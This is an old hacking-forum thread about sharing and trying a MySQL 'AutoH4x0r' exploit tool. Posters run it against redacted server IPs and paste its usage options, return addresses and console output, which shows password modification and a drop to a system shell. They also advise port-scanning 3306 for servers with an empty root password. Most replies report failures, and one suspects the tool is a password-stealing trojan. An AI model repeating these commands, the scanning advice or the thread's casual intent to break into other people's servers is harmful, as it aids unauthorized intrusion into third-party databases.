
Steffan
Hi, found this on the web.... it's BETA 3 but maybe it works...

I'm testing this.... have fun !!!

C'ya
Steven ;=

Chilli
good work, thank you

can you give me/us the pw? thx
Steffan
QUOTE (Chilli @ Nov 29 2003, 03:12 PM)
good work, thank you

can you give me/us the pw? thx

what PW do U like ?

U have to scan for targets.. mostly it will be root/NULL....

Have a nice day !

Steven ..
Freaky
Nice one Steffan.
Didn't test it but what I wanted to say:

You forgot to upload cygwin1.dll.

I attached the file.

Greetings
franz|gans
you are a n********************************
toxin
nice work m8te thx for this one
lonely
how can i scan on them?
SeNe
thanks dude gonna test it and see what i can find...
PSR
nice work man, i aint no haxor and i will never b one but thx for sharing.
datom
@ lonely

Do a port scan on port 3306 (mysql standard port).
Then check list with hscan.
hf and gl

@ Steffan
big thx for sharing, will test my sql server @ home
franz|gans
hrhr to all nooobs who leech this (filtered) is a beta and it will never run so good how the final!

HRHR
maxxis
thx for the file
is this a good exploit?
FLAT
nice

gonna test it ... hope it works
derquakecommander
Every time I get this

mysqlroot32 -d **.***.**.* -p NULL -t 2 -a 0
[+]---------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.1.5d BETA3 PoC
[+] by M@steR & Mantra, use requests.txt as shell-commands ;D
[+] check for further updates! report errors to Master1337@gmx.de
[+] DO NOT DISTRIBUTE !!! to (filtered) script kiddiez *GRRrr*
[+]---------------------------------------------------------------
[+] Running in Shell Mode happy typing
[+] Attacking: windows,using ret addr:0x77e7bec3,pad:72
[+] Connecting to mysql server **.***.**.*:3306....
[-] Error: Access denied for user: 'root@sutherland.securewebs.net' (Using passw
ord: YES)
0 [main] mysqlroot32 2416 handle_exceptions: Exception: STATUS_ACCESS_VIOL
ATION
266 [main] mysqlroot32 2416 open_stackdumpfile: Dumping stack trace to mysql
root32.exe.stackdump

Sorry but what is wrong?
i have tested:
mysqlroot32 -d **.***.**.* -p -t 2 -a 0
mysqlroot32 -d **.***.**.* -p -t 2 -a 0
mysqlroot32 -d **.***.**.* -t 2 -a 0
but nothing
Steffan
DO NOT USE -p option if PW is NULL !!!

cause if U just type the .exe name it shows U that default is already NULL !!

they'll bring a new one out soon, someone told me

C'ya
Steven

derquakecommander
yes i have tested mysqlroot32 -d **.***.**.* -t 2 -a 0 too.
Okay one question how can i change the root-user?
if the user is admin and not root ?

Okay now anything happened

[+] Running in Shell Mode happy typing
[+] Attacking: windows,using ret addr:0x77e7bec3,pad:72
[+] Connecting to mysql server **.***.***.***:3306....
[+] switching to debug mode -> report errorz to Master1337@gmx.de
[+] OK. let's try to rootit ;)
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User: nilsbyte
[+] Password length : 888
[+] Tyr to modify password....... ok
[+] Finding client socket......FAILED
[-] Cannot find client socket

why he found user: nilsbyte and not root?
FxF
no luck... i have tested 8 servers and always:

[+]---------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.1.5d BETA3 PoC
[+] by M@steR & Mantra, use requests.txt as shell-commands ;D
[+] check for further updates! report errors to Master1337@gmx.de
[+] DO NOT DISTRIBUTE !!! to (filtered) script kiddiez *GRRrr*
[+]---------------------------------------------------------------
[+] Running in Shell Mode happy typing
[+] Attacking: windows,using ret addr:0x77e7bec3,pad:72
[+] Connecting to mysql server *.*.*.*:3306....
[+] switching to debug mode -> report errorz to Master1337@gmx.de
[+] OK. let's try to rootit ;)
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User:
[+] Password length : 888
[+] Tyr to modify password....... ok
[+] Finding client socket......FAILED
[-] Cannot find client socket




FxF
Barvaz88
how can I put the username?

CODE

X:\SQL>mysqlroot32.exe -d xxx.xx.xx.xxx
[+]---------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.1.5d BETA3 PoC
[+] by M@steR & Mantra, use requests.txt as shell-commands;D
[+] check for further updates! report errors to Master1337@gmx.de
[+] DO NOT DISTRIBUTE !!! to (filtered) script kiddiez *GRRrr*
[+]---------------------------------------------------------------
[+] Running in Shell Mode happy typing
[+] Attacking: linux,using ret addr:0x42125b2b,pad:152
[+] Connecting to mysql server xxx.xx.xx.xxx:3306....
[+] switching to debug mode -> report errorz to Master1337@gmx.de
[+] OK. let's try to rootit;)
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User:
[+] Password length : 528
[+] Tyr to modify password.......  ok
[+] Finding client socket......FAILED
[-] Cannot find client socket

he isn't trying user how can I put?
Barvaz88
and there is another thing it saying:
CODE

X:\SQL>mysqlroot32.exe -d xxx.xx.xx.xxx
[+]---------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.1.5d BETA3 PoC
[+] by M@steR & Mantra, use requests.txt as shell-commands;D
[+] check for further updates! report errors to Master1337@gmx.de
[+] DO NOT DISTRIBUTE !!! to (filtered) script kiddiez *GRRrr*
[+]---------------------------------------------------------------
[+] Running in Shell Mode happy typing
[+] Attacking: linux,using ret addr:0x42125b2b,pad:152
[+] Connecting to mysql server xxx.xx.xx.xxx:3306....
[-] Error: Access denied for user: 'root@xxxxxxxxxxxxxxxx' (Us
ing password: NO)
     0 [main] mysqlroot32 3480 handle_exceptions: Exception: STATUS_ACCESS_VIOL
ATION
  1077 [main] mysqlroot32 3480 open_stackdumpfile: Dumping stack trace to mysql
root32.exe.stackdump


what is it?????
Kos
same too
Basti
[+]---------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.1.5d BETA3 PoC
[+] by M@steR & Mantra, use requests.txt as shell-commands;D
[+] check for further updates! report errors to Master1337@gmx.de
[+] DO NOT DISTRIBUTE !!! to (filtered) script kiddiez *GRRrr*
[+]---------------------------------------------------------------
[+] Running in Shell Mode happy typing
[+] Attacking: linux,using ret addr:0x42125b2b,pad:152
[+] Connecting to mysql server xxx.xx.xx.xxx:3306....
[+] switching to debug mode -> report errorz to Master1337@gmx.de
[+] OK. let's try to rootit;)
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User:
[+] Password length : 528
[+] Tyr to modify password....... ok
[+] Finding client socket......FAILED
[-] Cannot find client socket


in my opinion, this one is just crap... it doesn't work..

but look this passage:
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User:
[+] Password length : 528

looks more than changing the root password... so the releaser of this one could easily add the new password to his wordlist and he has more targets with his new password for root... you gonna help another one ? yes
2nd thing: a friend of mine told me, that he was able to see the source of this exploit -> it just changes the password

so you gonna secure mysql servers for another one... thx guys

another aspect: if you want to use a mysql exploit, then you need a buffer overflow, if there's an unknown buffer overflow, this exploit won't get public... otherwise there would be more mysql exploits and the bug should be already fixed.

so my recommendation: don't use this exploit... anyone who uses it, makes all vuln mysql worthless... (you just help another phony guy)...

another thing: if you don't know how to scan mysql, you better don't try it (dangerous logs with your ip and private address and the name of your younger sister)
Wolfman
Basti, i'v used this xploit and no it doesnt work, but it doesnt change the pass either. Just try scanning the same ip again and you'll see, it still has the same pass.
derquakecommander
QUOTE (Wolfman @ Nov 30 2003, 04:33 AM)
Basti, i'v used this xploit and no it doesnt work, but it doesnt change the pass either. Just try scanning the same ip again and you'll see, it still has the same pass.

You say it works, yes?
And you have hacked one
jak3c
thanks you for this sql tool....
Wolfman
QUOTE (derquakecommander @ Nov 30 2003, 01:03 PM)
QUOTE (Wolfman @ Nov 30 2003, 04:33 AM)
Basti, i'v used this xploit and no it doesnt work, but it doesnt change the pass either. Just try scanning the same ip again and you'll see, it still has the same pass.

You say it works, yes?
And you have hacked one

No, i said it doesn't work but that did not change the mysql pass either.
It's a pity though, cause there are a lot of vulnerable mysql out there ...
antique
Anyway, it won't work in Windows.

It's the opinion of a security specialist after analyzing the file ....
Kynroxes
great tools, tks man!
DJVASTVASTY2K
Hey Steffan

Thanks Bro

Am Gonna Test This Will Let You Know M8

Best Regards

Adam

Vast Gsm Team
Steffan
saw that on an IRC chat.....

[+]----------------------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.2.0a BETA4 PoC
[+] NOTE !! Win32 only works on W2K/SP4! (chines/english) send me offsets pls.
[+] DO NOT DISTRIBUTE !!! Private 0-day Exploit !!
[+]----------------------------------------------------------------------------
[+] Usage:mysqltest -d <IP> -u <user> -p <pass> -t <OStype> -a <0/1/2)
[+] -d target host ip/name
[+] -u login user (default root)
[+] -p 'root' password (default NULL)
[+] -a <val> 0=spwan a shell, 1=Autoh4xor, 2=Mixed Mode [default 0]
[+] -t OStype [default:1]
[+] 1 [0x42125b2b]: Linux:glibc-2.2.93-5
[+] 2 [0x77e7bec3]: Windows2000 EN/SP4


[+]----------------------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.2.0a BETA4 PoC
[+] NOTE !! Win32 only works on W2K/SP4! (chines/english) send me offsets pls.
[+] DO NOT DISTRIBUTE !!! Private 0-day Exploit !!
[+]----------------------------------------------------------------------------
[+] Running in Shell Mode
[+] Attacking: linux User: root password: (null)
[+] Connecting to mysql server xxxxxxxx:3306....
[+] server version: 4.0.15
[+] Connection info: xxxxxxxxxx via TCP/IP
[+] switching to debug mode -> report errors to Master1337@gmx.de
[+] OK. connected ;) let's try to rootit ;)
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User:
[+] Password length : 528
[+] Try to modify password....... ok
[+] Try to find client socket ...ok
[+] Overflow server (flushSQL)....ok
[+] sending OOB.......ok
[+] Connection to Shell pls. wait....
[+] Dropping to System Shell...

So they fixed the bug with the socket ?!
If someone finds it on the NET please post it here I NEED THE NEW ONE !!!

THX.
Steven
fredje
dont work the exploit 100% sure about that
antique
THAT'S RIGHT
Devil
what a pity....really doesn't work?? well if you guys say that...then i believe you all!!
UnDeRTaKeR
10x... although going to check it!
DJVASTVASTY2K
Thanks 4 The Effort Steffan

Tried Tested Not Working

35544 [main] mysqlroot32 2548 handle_exceptions: Exception: STATUS_PRIVILEGED_
INSTRUCTION
50011 [main] mysqlroot32 2548 open_stackdumpfile: Dumping stack trace to mysql
root32.exe.stackdump

Best Regards

Adam

Vast Gsm Team
Tomjack2000
Thanx for it ! i will try it !
Indiana
there is a new version out beta4 someone have it, i suppose this version will work correctly!
UnDeRTaKeR
Can you post it over here please mate?
Indiana
sorry i dont have it
damulint
Thanks..
I Would want to Mysql Autoh4x0r For Lin&win32...
That's Great..!!
Barvaz88
where can I get this new beta?
ivan288
yea this new beta sounds cool.
mortello
If someone has the Beta, he'll post it, stop asking for stuff, if they don't post, it means they don't want to for a reason or because they don't have it, plain and simple
nowhere
yes i think the same